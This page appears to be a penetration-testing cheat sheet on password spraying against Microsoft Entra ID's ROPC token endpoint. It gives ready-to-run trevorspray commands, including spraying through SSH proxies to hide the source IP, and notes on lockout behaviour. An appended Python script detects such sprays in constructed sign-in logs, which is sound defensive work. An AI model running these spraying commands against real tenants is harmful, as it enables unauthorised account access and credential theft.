
Entra Token/ROPC

Managed vs Federated (account lockout risks)

  • Federated and Managed + PTA: failed logins can accrue at AD (validation occurs on‑prem). Azure AD Smart Lockout may intercept before AD is hit, depending on thresholds.
  • Managed + PHS (no PTA): failed logins accrue at Entra (Smart Lockout).

Spraying via Entra succeeds only when the ROPC grant is allowed for the target app and tenant. Federated users generally can't authenticate via ROPC (the flow never redirects to the IdP). Note: ROPC isn't supported for hybrid federation; PTA is supported. Rare exception: HRD with AllowCloudPasswordValidation plus a synced password.

Check if a domain is managed or federated
trevorspray --recon <domain>

ROPC Token Endpoint Spraying

ROPC Token Endpoint
https://login.microsoftonline.com/<tenant_id_or_domain>/oauth2/v2.0/token

ROPC must be enabled on the app (allow public client flows). Federated users typically fail; managed users may succeed if ROPC isn't blocked.

TREVORspray - Automated ROPC Spraying

Password spray against `token_endpoint`
trevorspray -u <user_list> -p '<password>' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token
Password spray with round-robin SSH proxy
trevorspray -u <user_list> -p '<password>' --ssh root@<ssh_server> root@<ssh_server> -k <ssh_key>

Add -n to only spray using proxies, not your current IP.
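From the defending side, the lockout behaviour above and the ROPC token-endpoint flow both leave a recognisable trace in Entra sign-in logs: one source IP, many distinct accounts, the same failure code, and the occasional lockout or success. The script below is an added example (not from this page or the TREVORspray project) that runs that triage over constructed sign-in records. Field names follow the Microsoft Graph signIn resource as I understand it (userPrincipalName, ipAddress, authenticationProtocol, status.errorCode, createdDateTime); the sample values, thresholds and helper names are my own assumptions.

```python
"""Flag ROPC password-spray patterns in Entra ID sign-in records.

Added example, not page or project code. Records are constructed to imitate the
Microsoft Graph `signIn` shape; values are invented (TEST-NET addresses, example UPNs).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Entra sign-in error codes used for triage (as documented by Microsoft).
ERR_BAD_PASSWORD = 50126   # invalid username or password
ERR_LOCKED = 50053         # account locked (Smart Lockout)
ERR_NO_USER = 50034        # user account not found
FAILURE_CODES = (ERR_BAD_PASSWORD, ERR_NO_USER)


def _rec(ts, upn, ip, code, proto="ropc"):
    """Build one constructed sign-in record in the Graph signIn shape."""
    return {"createdDateTime": ts, "userPrincipalName": upn, "ipAddress": ip,
            "authenticationProtocol": proto, "status": {"errorCode": code}}


# Constructed sample: 203.0.113.10 tries one password across many accounts over ROPC
# (one guess lands, one account hits Smart Lockout); 198.51.100.7 is a single user
# mistyping a password; the last record is a normal browser sign-in and is ignored.
SAMPLE_SIGNINS = [
    _rec("2024-05-01T09:00:05Z", "a.adams@contoso.example", "203.0.113.10", 50126),
    _rec("2024-05-01T09:00:12Z", "b.brown@contoso.example", "203.0.113.10", 50126),
    _rec("2024-05-01T09:00:20Z", "c.chen@contoso.example", "203.0.113.10", 50126),
    _rec("2024-05-01T09:00:31Z", "d.diaz@contoso.example", "203.0.113.10", 50034),
    _rec("2024-05-01T09:00:44Z", "e.evans@contoso.example", "203.0.113.10", 50126),
    _rec("2024-05-01T09:00:59Z", "f.fox@contoso.example", "203.0.113.10", 0),
    _rec("2024-05-01T09:01:10Z", "g.gray@contoso.example", "203.0.113.10", 50053),
    _rec("2024-05-01T09:05:00Z", "h.hill@contoso.example", "198.51.100.7", 50126),
    _rec("2024-05-01T09:05:30Z", "h.hill@contoso.example", "198.51.100.7", 50126),
    _rec("2024-05-01T09:06:00Z", "h.hill@contoso.example", "198.51.100.7", 0),
    _rec("2024-05-01T09:07:00Z", "i.ito@contoso.example", "203.0.113.10", 0,
         proto="authorizationCode"),
]


def _parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_ropc_spray(records, window_minutes=10, min_distinct_users=5):
    """Return one finding per source IP whose ROPC failures hit at least
    `min_distinct_users` different accounts inside any `window_minutes` window.

    Only records with authenticationProtocol == "ropc" are considered, so ordinary
    interactive sign-ins from the same address do not inflate the counts.
    """
    by_ip = defaultdict(list)
    for r in records:
        if r.get("authenticationProtocol") == "ropc":
            by_ip[r["ipAddress"]].append(r)

    window = timedelta(minutes=window_minutes)
    findings = []
    for ip, events in by_ip.items():
        events.sort(key=lambda r: _parse_time(r["createdDateTime"]))
        fails = [r for r in events if r["status"]["errorCode"] in FAILURE_CODES]

        # Sliding window: for each failure as a start point, count distinct
        # accounts failing within the window; keep the peak.
        peak = 0
        for i, start in enumerate(fails):
            t0 = _parse_time(start["createdDateTime"])
            users = {r["userPrincipalName"] for r in fails[i:]
                     if _parse_time(r["createdDateTime"]) - t0 <= window}
            peak = max(peak, len(users))

        if peak >= min_distinct_users:
            findings.append({
                "ipAddress": ip,
                "distinct_failed_users": peak,
                "failed_attempts": len(fails),
                "lockouts": sum(r["status"]["errorCode"] == ERR_LOCKED for r in events),
                "successes": sum(r["status"]["errorCode"] == 0 for r in events),
                "first_seen": events[0]["createdDateTime"],
                "last_seen": events[-1]["createdDateTime"],
            })
    return findings


if __name__ == "__main__":
    for f in detect_ropc_spray(SAMPLE_SIGNINS):
        print(f)
```

The thresholds are deliberately low for the toy data; in production, tune the window and user count against your tenant's baseline, and treat a non-zero `successes` count on a flagged IP as the record to act on first (a spray that landed), followed by `lockouts`, which tells you the Smart Lockout thresholds from the first section are being reached.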